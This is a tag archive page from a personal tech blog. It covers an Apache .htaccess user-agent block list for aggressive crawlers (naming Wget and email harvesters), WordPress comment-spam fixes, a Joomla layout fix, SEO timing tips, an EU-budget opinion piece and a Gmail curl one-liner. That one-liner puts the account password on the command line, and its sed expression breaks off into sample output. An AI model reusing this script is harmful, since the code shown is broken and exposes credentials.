Posts Tagged ‘article’

Block Web server over loading Bad Crawler Bots and Search Engine Spiders with .htaccess rules

Monday, September 18th, 2017

howto-block-webserver-overloading-bad-crawler-bots-spiders-with-htaccess-modrewrite-rules-file

In last post, I've talked about the problem of Search Index Crawler Robots aggressively crawling websites and how to stop them (the article is here) explaning how to raise delays between Bot URL requests to website and how to completely probhit some bots from crawling with robots.txt.

As explained in article the consequence of too many badly written or agressive behaviour Spider is the "server stoning" and therefore degraded Web Server performance as a cause or even a short time Denial of Service Attack, depending on how well was the initial Server Scaling done.

The bots we want to filter are not to be confused with the legitimate bots, that drives real traffic to your website, just for information

 The 10 Most Popular WebCrawlers Bots as of time of writting are:
 

1. GoogleBot (The Google Crawler bots, funnily bots become less active on Saturday and Sundays :))

2. BingBot (Bing.com Crawler bots)

3. SlurpBot (also famous as Yahoo! Slurp)

4. DuckDuckBot (The dutch search engine duckduckgo.com crawler bots)

5. Baiduspider (The Chineese most famous search engine used as a substitute of Google in China)

6. YandexBot (Russian Yandex Search engine crawler bots used in Russia as a substitute for Google )

7. Sogou Spider (leading Chineese Search Engine launched in 2004)

8. Exabot (A French Search Engine, launched in 2000, crawler for ExaLead Search Engine)

9. FaceBot (Facebook External hit, this crawler is crawling a certain webpage only once the user shares or paste link with video, music, blog whatever  in chat to another user)

10. Alexa Crawler (la_archiver is a web crawler for Amazon's Alexa Internet Rankings, Alexa is a great site to evaluate the approximate page popularity on the internet, Alexa SiteInfo page has historically been the Swift Army knife for anyone wanting to quickly evaluate a webpage approx. ranking while compared to other pages)

Above legitimate bots are known to follow most if not all of W3C – World Wide Web Consorium (W3.Org) standards and therefore, they respect the content commands for allowance or restrictions on a single site as given from robots.txt but unfortunately many of the so called Bad-Bots or Mirroring scripts that are burning your Web Server CPU and Memory mentioned in previous article are either not following /robots.txt prescriptions completely or partially.

Hence with the robots.txt unrespective bots, the case the only way to get rid of most of the webspiders that are just loading your bandwidth and server hardware is to filter / block them is by using Apache's mod_rewrite through

 

.htaccess


file

Create if not existing in the DocumentRoot of your website .htaccess file with whatever text editor, or create it your windows / mac os desktop and transfer via FTP / SecureFTP to server.

I prefer to do it directly on server with vim (text editor)

 

 

vim /var/www/sites/your-domain.com/.htaccess

 

RewriteEngine On

IndexIgnore .htaccess */.??* *~ *# */HEADER* */README* */_vti*

SetEnvIfNoCase User-Agent "^Black Hole” bad_bot
SetEnvIfNoCase User-Agent "^Titan bad_bot
SetEnvIfNoCase User-Agent "^WebStripper" bad_bot
SetEnvIfNoCase User-Agent "^NetMechanic" bad_bot
SetEnvIfNoCase User-Agent "^CherryPicker" bad_bot
SetEnvIfNoCase User-Agent "^EmailCollector" bad_bot
SetEnvIfNoCase User-Agent "^EmailSiphon" bad_bot
SetEnvIfNoCase User-Agent "^WebBandit" bad_bot
SetEnvIfNoCase User-Agent "^EmailWolf" bad_bot
SetEnvIfNoCase User-Agent "^ExtractorPro" bad_bot
SetEnvIfNoCase User-Agent "^CopyRightCheck" bad_bot
SetEnvIfNoCase User-Agent "^Crescent" bad_bot
SetEnvIfNoCase User-Agent "^Wget" bad_bot
SetEnvIfNoCase User-Agent "^SiteSnagger" bad_bot
SetEnvIfNoCase User-Agent "^ProWebWalker" bad_bot
SetEnvIfNoCase User-Agent "^CheeseBot" bad_bot
SetEnvIfNoCase User-Agent "^Teleport" bad_bot
SetEnvIfNoCase User-Agent "^TeleportPro" bad_bot
SetEnvIfNoCase User-Agent "^MIIxpc" bad_bot
SetEnvIfNoCase User-Agent "^Telesoft" bad_bot
SetEnvIfNoCase User-Agent "^Website Quester" bad_bot
SetEnvIfNoCase User-Agent "^WebZip" bad_bot
SetEnvIfNoCase User-Agent "^moget/2.1" bad_bot
SetEnvIfNoCase User-Agent "^WebZip/4.0" bad_bot
SetEnvIfNoCase User-Agent "^WebSauger" bad_bot
SetEnvIfNoCase User-Agent "^WebCopier" bad_bot
SetEnvIfNoCase User-Agent "^NetAnts" bad_bot
SetEnvIfNoCase User-Agent "^Mister PiX" bad_bot
SetEnvIfNoCase User-Agent "^WebAuto" bad_bot
SetEnvIfNoCase User-Agent "^TheNomad" bad_bot
SetEnvIfNoCase User-Agent "^WWW-Collector-E" bad_bot
SetEnvIfNoCase User-Agent "^RMA" bad_bot
SetEnvIfNoCase User-Agent "^libWeb/clsHTTP" bad_bot
SetEnvIfNoCase User-Agent "^asterias" bad_bot
SetEnvIfNoCase User-Agent "^httplib" bad_bot
SetEnvIfNoCase User-Agent "^turingos" bad_bot
SetEnvIfNoCase User-Agent "^spanner" bad_bot
SetEnvIfNoCase User-Agent "^InfoNaviRobot" bad_bot
SetEnvIfNoCase User-Agent "^Harvest/1.5" bad_bot
SetEnvIfNoCase User-Agent "Bullseye/1.0" bad_bot
SetEnvIfNoCase User-Agent "^Mozilla/4.0 (compatible; BullsEye; Windows 95)" bad_bot
SetEnvIfNoCase User-Agent "^Crescent Internet ToolPak HTTP OLE Control v.1.0" bad_bot
SetEnvIfNoCase User-Agent "^CherryPickerSE/1.0" bad_bot
SetEnvIfNoCase User-Agent "^CherryPicker /1.0" bad_bot
SetEnvIfNoCase User-Agent "^WebBandit/3.50" bad_bot
SetEnvIfNoCase User-Agent "^NICErsPRO" bad_bot
SetEnvIfNoCase User-Agent "^Microsoft URL Control – 5.01.4511" bad_bot
SetEnvIfNoCase User-Agent "^DittoSpyder" bad_bot
SetEnvIfNoCase User-Agent "^Foobot" bad_bot
SetEnvIfNoCase User-Agent "^WebmasterWorldForumBot" bad_bot
SetEnvIfNoCase User-Agent "^SpankBot" bad_bot
SetEnvIfNoCase User-Agent "^BotALot" bad_bot
SetEnvIfNoCase User-Agent "^lwp-trivial/1.34" bad_bot
SetEnvIfNoCase User-Agent "^lwp-trivial" bad_bot
SetEnvIfNoCase User-Agent "^Wget/1.6" bad_bot
SetEnvIfNoCase User-Agent "^BunnySlippers" bad_bot
SetEnvIfNoCase User-Agent "^Microsoft URL Control – 6.00.8169" bad_bot
SetEnvIfNoCase User-Agent "^URLy Warning" bad_bot
SetEnvIfNoCase User-Agent "^Wget/1.5.3" bad_bot
SetEnvIfNoCase User-Agent "^LinkWalker" bad_bot
SetEnvIfNoCase User-Agent "^cosmos" bad_bot
SetEnvIfNoCase User-Agent "^moget" bad_bot
SetEnvIfNoCase User-Agent "^hloader" bad_bot
SetEnvIfNoCase User-Agent "^humanlinks" bad_bot
SetEnvIfNoCase User-Agent "^LinkextractorPro" bad_bot
SetEnvIfNoCase User-Agent "^Offline Explorer" bad_bot
SetEnvIfNoCase User-Agent "^Mata Hari" bad_bot
SetEnvIfNoCase User-Agent "^LexiBot" bad_bot
SetEnvIfNoCase User-Agent "^Web Image Collector" bad_bot
SetEnvIfNoCase User-Agent "^The Intraformant" bad_bot
SetEnvIfNoCase User-Agent "^True_Robot/1.0" bad_bot
SetEnvIfNoCase User-Agent "^True_Robot" bad_bot
SetEnvIfNoCase User-Agent "^BlowFish/1.0" bad_bot
SetEnvIfNoCase User-Agent "^JennyBot" bad_bot
SetEnvIfNoCase User-Agent "^MIIxpc/4.2" bad_bot
SetEnvIfNoCase User-Agent "^BuiltBotTough" bad_bot
SetEnvIfNoCase User-Agent "^ProPowerBot/2.14" bad_bot
SetEnvIfNoCase User-Agent "^BackDoorBot/1.0" bad_bot
SetEnvIfNoCase User-Agent "^toCrawl/UrlDispatcher" bad_bot
SetEnvIfNoCase User-Agent "^WebEnhancer" bad_bot
SetEnvIfNoCase User-Agent "^TightTwatBot" bad_bot
SetEnvIfNoCase User-Agent "^suzuran" bad_bot
SetEnvIfNoCase User-Agent "^VCI WebViewer VCI WebViewer Win32" bad_bot
SetEnvIfNoCase User-Agent "^VCI" bad_bot
SetEnvIfNoCase User-Agent "^Szukacz/1.4" bad_bot
SetEnvIfNoCase User-Agent "^QueryN Metasearch" bad_bot
SetEnvIfNoCase User-Agent "^Openfind data gathere" bad_bot
SetEnvIfNoCase User-Agent "^Openfind" bad_bot
SetEnvIfNoCase User-Agent "^Xenu’s Link Sleuth 1.1c" bad_bot
SetEnvIfNoCase User-Agent "^Xenu’s" bad_bot
SetEnvIfNoCase User-Agent "^Zeus" bad_bot
SetEnvIfNoCase User-Agent "^RepoMonkey Bait & Tackle/v1.01" bad_bot
SetEnvIfNoCase User-Agent "^RepoMonkey" bad_bot
SetEnvIfNoCase User-Agent "^Zeus 32297 Webster Pro V2.9 Win32" bad_bot
SetEnvIfNoCase User-Agent "^Webster Pro" bad_bot
SetEnvIfNoCase User-Agent "^EroCrawler" bad_bot
SetEnvIfNoCase User-Agent "^LinkScan/8.1a Unix" bad_bot
SetEnvIfNoCase User-Agent "^Keyword Density/0.9" bad_bot
SetEnvIfNoCase User-Agent "^Kenjin Spider" bad_bot
SetEnvIfNoCase User-Agent "^Cegbfeieh" bad_bot

 

<Limit GET POST>
order allow,deny
allow from all
Deny from env=bad_bot
</Limit>

 


Above rules are Bad bots prohibition rules have RewriteEngine On directive included however for many websites this directive is enabled directly into VirtualHost section for domain/s, if that is your case you might also remove RewriteEngine on from .htaccess and still the prohibition rules of bad bots should continue to work
Above rules are also perfectly suitable wordpress based websites / blogs in case you need to filter out obstructive spiders even though the rules would work on any website domain with mod_rewrite enabled.

Once you have implemented above rules, you will not need to restart Apache, as .htaccess will be read dynamically by each client request to Webserver

2. Testing .htaccess Bad Bots Filtering Works as Expected


In order to test the new Bad Bot filtering configuration is working properly, you have a manual and more complicated way with lynx (text browser), assuming you have shell access to a Linux / BSD / *Nix computer, or you have your own *NIX server / desktop computer running
 

Here is how:
 

 

lynx -useragent="Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)" -head -dump http://www.your-website-filtering-bad-bots.com/

 

 

Note that lynx will provide a warning such as:

Warning: User-Agent string does not contain "Lynx" or "L_y_n_x"!

Just ignore it and press enter to continue.

Two other use cases with lynx, that I historically used heavily is to pretent with Lynx, you're GoogleBot in order to see how does Google actually see your website?
 

  • Pretend with Lynx You're GoogleBot

 

lynx -useragent="Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" -head -dump http://www.your-domain.com/

 

 

  • How to Pretend with Lynx Browser You are GoogleBot-Mobile

 

lynx -useragent="Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_1 like Mac OS X; en-us) AppleWebKit/532.9 (KHTML, like Gecko) Version/4.0.5 Mobile/8B117 Safari/6531.22.7 (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)" -head -dump http://www.your-domain.com/

 


Or for the lazy ones that doesn't have Linux / *Nix at disposal you can use WannaBrowser website

Wannabrowseris a web based browser emulator which gives you the ability to change the User-Agent on each website req1uest, so just set your UserAgent to any bot browser that we just filtered for example set User-Agent to CheeseBot

The .htaccess rule earier added once detecting your browser client is coming in with the prohibit browser agent will immediately filter out and you'll be unable to access the website with a message like:
 

HTTP/1.1 403 Forbidden

 

Just as I've talked a lot about Index Bots, I think it is worthy to also mention three great websites that can give you a lot of Up to Date information on exact Spiders returned user-agent, common known Bot traits as well as a a current updated list with the Bad Bots etc.

Bot and Browser Resources information user-agents, bad-bots and odd Crawlers and Bots specifics

1. botreports.com
2. user-agents.org
3. useragentapi.com

 

An updated list with robots user-agents (crawler-user-agents) is also available in github here regularly updated by Caia Almeido

There are also a third party plugin (modules) available for Website Platforms like WordPress / Joomla / Typo3 etc.

Besides the listed on these websites as well as the known Bad and Good Bots, there are perhaps a hundred of others that might end up crawling your webdsite that might or might not need  to be filtered, therefore before proceeding with any filtering steps, it is generally a good idea to monitor your  HTTPD access.log / error.log, as if you happen to somehow mistakenly filter the wrong bot this might be a reason for Website Indexing Problems.

Hope this article give you some valueable information. Enjoy ! 🙂

 

Remove URL from comments in WordPress Blogs and Websites to mitigate comment spam URLs in pages

Friday, February 20th, 2015

remove-comment-spam-url-field-wordpress-website-or-blog-working-how-to
If you're running a WordPress blog or Website where you have enabled comments for a page and your article or page is well indexing in Google (receives a lot of visit / reads ) daily, your site posts (comments) section is surely to quickly fill in with a lot of "Thank you" and non-sense Spam comments containing an ugly link to an external SPAM or Phishing website.

Such URL links with non-sense message is a favourite way for SPAMmers to raise their website incoming (other website) "InLinks" and through that increase current Search Engine position. 

We all know a lot of comments SPAM is generally handled well by Akismet but unfortunately still many of such spam comments fail to be identified as Spam  because spam Bots (text-generator algorithms) becomes more and more sophisticated with time, also you can never stop paid a real-persons Marketers to spam you with a smart crafted messages to increase their site's SEO ).
In all those cases Akismet WP (Anti-Spam) plugin – which btw is among the first "must have"  WP extensions to install on a new blog / website will be not enough ..

To fight with worsening SEO because of spam URLs and to keep your site's SEO better (having a lot of links pointing to reported spam sites will reduce your overall SEO Index Rate) many WordPress based bloggers, choose to not use default WordPress Comments capabilities – e.g. use exnternal commenting systems such as Disqus – (Web Community of Communities), IntenseDebate, LiveFyre, Vicomi

However as Disqus and other 3rd party commenting systems are proprietary software (you don't have access to comments data as comments are kept on proprietary platform and shown from there), I don't personally recommend (or use) those ones, yes Disqus, Google+, Facebook and other comment external sources can have a positive impact on your SEO but that's temporary event and on the long run I think it is more advantageous to have comments with yourself.
A small note for people using Disqos and Facebook as comment platforms – (just imagine if Disqos or Facebook bankrupts in future, where your comments will be? 🙂 )

So assuming that you're a novice blogger and I succeeded convincing you to stick to standard (embedded) WordPress Comment System once your site becomes famous you will start getting severe amount of comment spam. There is plenty of articles already written on how to remove URL comment form spam in WordPress but many of the guides online are old or obsolete so in this article I will do a short evaluation on few things I tried to remove comment spam and how I finally managed to disable URL link spam to appear on site.
 

1. Hide Comment Author Link (Hide-wp-comment-author-link)

This plugin is the best one I found and I started using it since yesterday, I warmly recommend this plugin because its very easy, Download, Unzip, Activate and there you're anything typed in URL field will no longer appear in Posts (note that the URL field will stay so if you want to keep track on person's input URL you can get still see it in Wp-Admin). I'm using default WordPress WRC (Kubrick), but I guess in most newer wordpress plugins is supposed to work. If you test it on another theme please drop a comment to inform whether works for you.  Hide Comment Author Link works on current latest Wordpress 4.1 websites.

A similar plugin to hide-wp-author-link that works and you can use is  Hide-n-Disable-comment-url-field, I tested this one but for some reason I couldn't make it work.

wordpress-remove-delete-hide-n-disable-url-comment-without-deleting-the-form-url-field-screenshot-reduce-comment-spam
Whatever I type in Website field in above form, this is wiped out of comment once submitted 🙂
 

2. Disable hide Comment URL (disable-hide-comment-url)

I've seen reports disable-hide-comment-url works on WordPress 3.9.1, but it didn't worked for me, also the plugin is old and seems no longer maintaned (its last update was 3.5 years ago), if it works for you please please drop in comment your WP version, on WP 4.1 it is not working.

disable-hide-comment-url-screenshot-plugin-to-disable-comment-url-spam-in-wordpress-sites
 


3. WordPress Anti-Spam plugin

WordPress Anti-Spam plugin is a very useful addition plugin to install next to Akismet. The plugin is great if you don't want to remove commenter URL to show in the post but want to cut a lot of the annoying Spam Robots crawling ur site.
 

Anti-spam plugin blocks spam in comments automatically, invisibly for users and for admins.

  • no captcha, because spam is not users' problem
  • no moderation queues, because spam is not administrators' problem
  • no options, because it is great to forget about spam completely

Plugin is easy to use: just install it and it just works.

Anti bot works fine on WP 4.1

4. Stop Spam Comments

Stop Spam Comments is:

  • Dead simple: no setup required, just activate it and enjoy your spam-free website.
  • Lightweight: no additional database queries, it doesn't add script files or other assets in your theme. This means your website performance will not be affected and your server will thank you.
  • Invisible by design: no captchas, no tricky questions or any other user interaction required at all.
     

Stop Spam Comments works fine on WP 4.1.

I've mentioned few of the plugins which can help you solve the problem, but as there are a lot of anti-spam URL plugins available for WP its up to you to test and see what fits you best. If you know or use some other method to protect yourself from Comment Url Spam to share it please.

Import thing to note is it usually a bad idea to mix up different anti-spam plugins so don't enable both Stop Spam Comments and WordPress Anti Spam plugin.

5. Comment Form Remove Url field Manually 

This (Liberian) South) African blog describes a way how to remove URL field URL manually

In short to Remove Url Comment Field manually either edit function.php (if you have Shell SSH access) or if not do it via Wp-Admin web interface:
 

WordPress admin page –> Appearance –> Editor


Paste at the end of file following PHP code:

 

add_filter('comment_form_default_fields', 'remove_url');
 function remove_url($fields)
 {
 if(isset($fields[‘url’]))
 unset($fields[‘url’]);
 return $fields;
 }


Now to make changes effect, Restart Apache / Nginx Webserver and clean any cache if you're using a plugin like W3 Total Cache plugin etc.

Other good posts describing some manual and embedded WordPress ways to reduce / stop comment spam is here and here, however as it comes to my blog, none of the described manual (code hack) ways I found worked on WordPress v. 4.1.
Thus I personally stuck to using Hide and Disable Comment URL plugin  to get rid of comment website URL.

Joomla 1.5 fix news css problem partial text (article text not completely showing in Joomla – Category Blog Layout problem)

Monday, October 20th, 2014

joomla-fix-weird-news-blog-article-text-incompletely-shown-category-blog-website-layout-problem

I’m still administrating some old archaic Joomla website built on top of Joomla 1.5. Recently there were some security issues with the website so I first tried using jupgrade (Upgrade Joomla 1.5 to Joomla 2.5) plugin to try to resolve the issues. As there were issues with the upgrade, because of used template was not available for Joomla 2.5, I decided to continue using Joomla 1.5 and applied the Joomla 1.5 Security Patch. I also had to disable a couple of unused joomla components and the contact form in order to prevent spammers of randomly spamming through the joomla … the Joomla Security Scanner was mostly useful in order to fix the Joomla security holes ..

So far so good this Joomla solved security but just recently I was asked to add a new article the Joomla News section – (the news section is configure to serve as a mini site blog as there are only few articles added every few months). For my surprise all of a sudden the new joomla article text started displaying text and pictures partially. The weirdly looking newly added news looked very much like some kind of template or css problem. I tried debugging the html code but unfortunately my knowledge in CSS is not so much, so as a next step I tried to temper some settings from Joomla Administrator in hope that this would resolve the text which was appearing from article used to be cut even though the text I’ve placed in artcle seemed correctly formatted. I finally pissed off trying to solve the news section layout problem so looked online too see if anyone else didn’t stick out to same error and I stumbled on Joomla’s forum explaining the Category Blog Layout Problem

The solution to the Joomla incomplete text showing in article is – To go to Joomla administrator menus:

1. Menus -> Main Menu -> (Click on Menu Item(s) – Edit Menu Item(s)) button
2. Click on News (section)
In Parameters section (on the botton right) of screen you will see #Leading set to some low number for example it will be something like 8 or 9. The whole issue in my case was that I was trying to add more than 8 articles and I had a Leading set to 8 and in order to add more articles and keep proper leading I had to raise it to more. To prevent recent leading errors, I’ve raised the Leading to 100 like shown in below screenshot
joomla-blog-layout-basic-parameters-screenshot-fix-joomla-news-cut-text-problem-screenshot

After raising to some high number click Apply and you’re done your problem is solved 🙂
For those curious what the above settings from screenshot mean:

# Leading Articles -> This refers to the number of articles that are to be shown to the full width
# Intro Articles -> This refers to the number of articles that are not to be shown to full width
# Columns -> This refers to the number of columns in which the articles will be shown that are identified as #Intro. If #Intro is zero this setting has no effect
# Links -> Number of articles that are to be shown as links. The number of articles should exceed #leading + #Intro

N.B. Solving this issue took me quite a long time and it caused me a lot of attempts to resolve it. I tried creating the article from scratch, making copy from an old article etc. I even messed few of the news articles one time so badly that I had to recreate them from scratch, before doing any changes to obsolete joomlas always make database and file content backup otherwise you will end up like me in situation loosing 10 hours of your time ..

The bitter experiences once again with Joomla convinced me when I have time I have to migrate this Joomla CMS to WordPress. My so far experience with Joomla prooved to me just for one time the time and nerves spend to learn joomla and built a multi-lingual website with it as well as to administer it with joomla obscure and hard to cryptic interfaces and multiple security issues., makes this CMS completely unworthy to study or use, its hardness to upgrade from release to release, besides its much slow and its less plugins if compared to WordPress makes wordpress much better (and easier to build use platform than Joomla).
So if you happen to be in doubt where to use Joomla or a WordPress to build a new company / community website or a blog my humbe advise is – choose WordPress!

SEO: Best day and time to write new articles and tweet to get more blog reads – Social Network Timing

Tuesday, June 17th, 2014

what-is-best-time-to-write-articles-to-increase-your-blog-traffic

I'm trying to regularly blog – as this gives me a roadmap what I'm into and how I spent my time. When have free time,  I blog almost daily except on weekends (as in weekends I'm trying to stay away from computers). So if you want to attract more readers to your blog the interesting question arises
 

What time is best to hit publish on your posts?

writing-in-the-mogning-on-the-internet-timing-morning-is-best-for-your-posts
Now there are different angles from where you can extract conclusions on best timing to blog post.One major thing to consider always when posting is that highest percentage of users read blogs in the morning with their morning coffee. Here are some more facts on when web content is more red:

  • 70% of users say they read blogs in the morning
  • More men read blogs at night than woman
  • Mondays are the highest traffic days for avarage blogs
  • 11 a.m. is normally the highest traffic hour for blogs
  • Usually most comments are put on Saturdays
  • Blogs with more than one post a day has higher chance of inbound links and usually get more unique visitors

As my blog is more technical oriented most of my visitors are men and therefore posting my blogs at night doesn't interfere much with my readers.
However, I've noticed that for me personally posting in time interval from 13:00 to 17:00 influence positively the amount of unique visitors the blog gets.

According to research done by Social Fresh – Thursday is the best day to publish an article if you want to get more Social SharesBest-Day-to-Blog-to-get-more-shares-in-social-networks

As a rule of thumb Thursday wins 10% more shares than all other days. In fact, 31% of the top 100 social share days in 2011 fell on Thursday.
My logical explanation on this phenomenon is that people tend to be more and more bored from their work and try to entertain more and more as the week progresses.

To get more attention on what I'm writting I use a bit of social networking but I prefer using only a micro blogging social networking.  I use Twitter to share what I'm into. When I write a new article on my blog I tweet its title with a link to my article, because this drives people attention to what I have to say.

In overall I am skeptical about social siting like Facebook and MySpace because it has negative impact on how people use their time and especially negative on youngsters Other reason why I don't like Friends Networks is because sharing what you have to say on sites like FB, Google+ or "The Russian Facebook" –  Vkontekte VK.com are not respecting privacy of your data.

 

You write free fresh content for their website for free and you get nothing!

 

Moreover by daily posting latest buzz you read / watched on Facebook etc. or simply saying what's happening with you, where you're situated now etc., you slowly get addicted to posting – yes for good or bad people tend to be maniacal).

By placing all of your pesronal or impersonal stuff online, you're making these sites better index their sites into Google / Yahoo / Yandex search engines and therefore making them profitable and high ranked websites on the internet and giving out your personal time for Facebook profit? + you loose control over your data (your data is not physically on your side but situated on some remote server, somewhere on the internet).
 

Best avarage time to post on Tweet Facebook, Google+ and Linkedin

best-time-and-day-to-write-new-articles-schedule-content-at-the-right-time-on-social-media-to-get-high-trafficrank

So What is Best Day timing to Post, Pin or Tweet?

Below is an infographic I fond on this blog (visual data is originalcompiled by SurePayRoll) and showing visualized results from some extensive research on the topic.

best-time-to-post-and-tweet-blog-articles-social-media-infographic


Here is most important facts this infographic reveals:


The avarage best time to post tweet and pin your new articles is about 15:00 h
 

  • Best timing to post on Twitter is on Mondays to Thursdays from 13:00 to 15:00 h
  • Best timing to post on facebook is between 13:00 and 16:00 h
  • For Linkedin it is best to place your publish between Tuesdays to Thursdays


Peak times on Facebook, Twitter and Linkedin

  • Peak times for use of Facebook is on Wednesdays about 15:00 h
  • Peak times for use of Twitter is from Monday to Thursdays from 9:00  to 15:00 h
  • Linkedin Peak time is from 17:00 to 18:00 h
  • Including images to your articles increases traffic, tweets with images increase visits, favorites and leads


Worst time (when users will probably not view your content) on FB, Twitter and Linkedin

  • Weekends before 08:00  and after 20:00 h
  • Everyday after 20:00 and Fridays after 15:00 noon
  • Mondays and Fridays from 22:00 to 06:00 morning

Facts about Google+
 

  • Google+ is the fastest growing demographic social network for people aged 45 to 54
  • Best time to share your posts on Google+ is from 09:00 to 10:00 in the morning
  • Including images to your articles increases traffic, tweets with images increase visits, favorites and leads
     

Images generate more traffic and engagement

  • Including images to your articles increases traffic, tweets with images increase visits, favorites and leads


I'm aware as every research above info on best time to tweet and post is just a generalization and according to field of information posted suggested time could be different from optiomal time for individual writer, however as a general direction, info is very useful and it gives you some idea.
Twitter engagement for brands is 17% higher on weekends according to Dan Zarrella’s research. Tweets posted on Friday, Saturday and Sunday had higher CTR (Click Through Rate) than those posted in the rest of the week.

tweet-on-the-weekends-is-better-for-high-click-through-rate

Other best day to tweet other than weekends is mid-week time Wednesday.
Whether your site or blog is using retweet to generate more traffic to website best time to retweet is said to be around 5 pm. CTR is higher

Bulgarian misery net sponsor of European welfare – Statistics on European Union country installments

Tuesday, June 10th, 2014

european-union-fed-by-people-misery-bulgarian-misery-sponsor-of-european-welfare

Budget of European Union for 2011 is 142 billion Euro. Main source of budget income are installments from country members. Installments paid to EU consist about 1 of countries GDP – and approximately this is the amount of money paid  per EU country member.

For Bulgaria installment is about 426 million euro. The bigger GDP is the bigger the amount of money the respective country pains to the overall European Union budget. Even though payments of member countries is only 1% of GDP, this is the source for about 70% of income of EU.

Other source of money for European Union community comes from VAT taxes, and countries customs taxes (over import / export goods) collected on external border of EU community. In national budgets. Member countries give out 75% of their quotes over the custom incomes, collected in external borders of EU. In national counry budget only 25% of money made from customs control imports and imports influx. In Bulgaria's case we can be talk about the import crossing borders of Macedonia, Serbia and Turkey. Import from VAT taxes in 2011 are 3 370 billion leva and from customs 131 million leva. What percantage of this money went to European Union knows only experts.
For last year the Brussels money for Bulgaria are only 1.33 billion Euro (just to compare Poland received 16 736 billion euro). What is even more sad is that money coming from European union for so called funds influx into the pockets of well known oligarchs.

As it looks even though the glorifications with which Bulgarian government gave to the acquisition of this 1.33 billions eur-obrussel gifts during last year our coutnry still remains net sponsor of European budget. Here are not included the country econonic losses of the membership in EU, for example the closure of reactors of our Nuclear Power Plant in Kozloduy. In mean time about 1% of budget of EU community comes from installments from EU employees, unspent money from EU country members as well as receipts from fines from firms and companies for breachment of laws for protectition of competition and normative acts.
Primary supplier in European Union budget is Germany.
 

  • In 2011, Germany paid to EU 27 954 billion euro. This is about 19.7 of all the Union incomes.
  • Second to Germany by paid country member fee to EU is France with 23.273 billion euros, about 16.4% of all EU income.
  • Third is Italy with 18 447 billion euros or 13% of all EU budget.

As prior mentioned in 2011 direct installment of Bulgaria is 0.426 billion euro (without VAT quotes and incomes from taxation). Less installments paid Esthonia, Lithuania, Malta, Cyprus, Luxemburg (!!!) and Slovenia. Even though all this countries has less teritoriy and less population all this countries are much richer and has a higher GDP per capita!
 

  • Hungary (10 million people)'s installment is 1.135 billions and Romania's installment (Romania – 21.7 million people) was 1.419 billion euro.

Finally – lets take a look of EU country installments per capita of some of member countries.

  • Last year the avarage european give for Brussels burocracy 0.78 euro a day!

Question is how it is possible for everyone to pay 0.78 euro for European Adminsitration? – if there is high unemployment in Bulgaria and a lot of people doesn't receive even 0.78 a day?

European Union returned money in terms of funds does not create fabrics or industry and therefore doesn't create employment – doesn't reduce unemployment ?


Does really Bulgaria and we Bulgarians advantage of the European Union?

Avarage Bulgarian paid 0.16 euro per day – the lowest individual installment in union
 

  • average Latvian, Romanian and Lithuanian,  paid (0.17, 0, 18, 0.24 euro cents a day).

     

     

    The most paid citizens of the excessively rich principality

  • Luxemburg1.52 euro a day per person, followed by Danes, Belgians, Swedes, Dutch, Irish, French and Austrians (ranging from 1.47 euro to 0.98 euro).

As some of European Union citizens might not known,few million of Euro of this money is spend on a move of European deputies from Brussels to Strasburg every month (money given for travel costs of EU deputies and physical move of resources from Brussels to Strasburg). The exact sum spend per year for this unmeaningful move (in order to fulfil European community old legislation varies from 150 to 200 million a year!)

Make your WordPress Blog or Site Mobile Friendly with WPTouch plugin

Friday, January 24th, 2014

make your wordpress mobile friendly plugin wordpress mobile seo logo

I bough a new Mobile Phone changing my old Nokia Communicator 9300i (powered by Symbian) with ZTE Blade 3 with Android. I'm not a big fan of big mobility myself. However as I already have it decided to test my blog with Mobile phone default browser and my blog theme looked really crappy. Knowing that the amount of Mobile devices on the Internet is increasing dramatically these days raises the chance my blog is found by Mobile user thus its nice my blog to be Mobile ready well …

To solve that I did a quick search in google and found WPToucha mobile plugin for WordPress that automatically enables a simple and elegant mobile theme for mobile visitors of your WordPress website
To install it downloaded the plugin in usual /var/www/blog/wp-content/plugins , enabled it and refreshed in Android Mobile Browser and my blog appeared great in a theme specially designed for mobile browsers as you can see in below screenshot:

my-blog-outlook-in-mobile-android-browser-with-wptouch-wordpress-plugin-screenshot

If you still haven't tried WPTouch give it a try.

How to quickly check unread Gmail emails on GNU / Linux – one liner script

Monday, April 2nd, 2012

I've hit an interesting article explaining how to check unread gmail email messages in Linux terminal. The original article is here

Being able to read your latest gmail emails in terminal/console is great thing, especially for console geeks like me.
Here is the one liner script:

curl -u GMAIL-USERNAME@gmail.com:SECRET-PASSWORD \
--silent "https://mail.google.com/mail/feed/atom" | tr -d '\n' \
| awk -F '' '{for (i=2; i<=NF; i++) {print $i}}' \
| sed -n "s/

Linux Users Group M. – [7] discussions, [10] comments and [2] jobs on LinkedIn
Twitter – Lynn Serafinn (@LynnSerafinn) has sent you a direct message on Twitter!
Facebook – Sys, you have notifications pending
Twitter – Email Marketing (@optinlists) is now following you on Twitter!
Twitter – Lynn Serafinn (@LynnSerafinn) is now following you on Twitter!
NutshellMail – 32 New Messages for Sat 3/31 12:00 PM
Linux Users Group M. – [10] discussions, [5] comments and [8] jobs on LinkedIn
eBay – Deals up to 60% OFF + A Sweepstakes!
LinkedIn Today – Top news today: The Magic of Doing One Thing at a Time
NutshellMail – 29 New Messages for Fri 3/30 12:00 PM
Linux Users Group M. – [16] discussions, [8] comments and [8] jobs on LinkedIn
Ervan Faizal Rizki . – Join my network on LinkedIn
Twitter – LEXO (@LEXOmx) retweeted one of your Tweets!
NutshellMail – 24 New Messages for Thu 3/29 12:00 PM
Facebook – Your Weekly Facebook Page Update
Linux Users Group M. – [11] discussions, [9] comments and [16] jobs on LinkedIn

As you see this one liner uses curl to fetch the information from mail.google.com's atom feed and then uses awk and sed to parse the returned content and make it suitable for display.

If you want to use the script every now and then on a Linux server or your Linux desktop you can download the above code in a script file -quick_gmail_new_mail_check.sh here

Here is a screenshot of script's returned output:

Quick Gmail New Mail Check bash script screenshot

A good use of a modified version of the script is in conjunction with a 15 minutes cron job to launch for new gmail mails and launch your favourite desktop mail client.
This method is useful if you don't want a constant hanging Thunderbird or Evolution, pop3 / imap client on your system to just take up memory or dangle down the window list.
I've done a little modification to the script to simply, launch a predefined email reader program, if gmail atom feed returns new unread mails are available, check or download my check_gmail_unread_mail.sh here
Bear in mind, on occasions of errors with incorrect username or password, the script will not return any errors. The script is missing a properer error handling.Therefore, before you use the script make sure:

gmail_username='YOUR-USERNAME';
gmail_password='YOUR-PASSWORD';

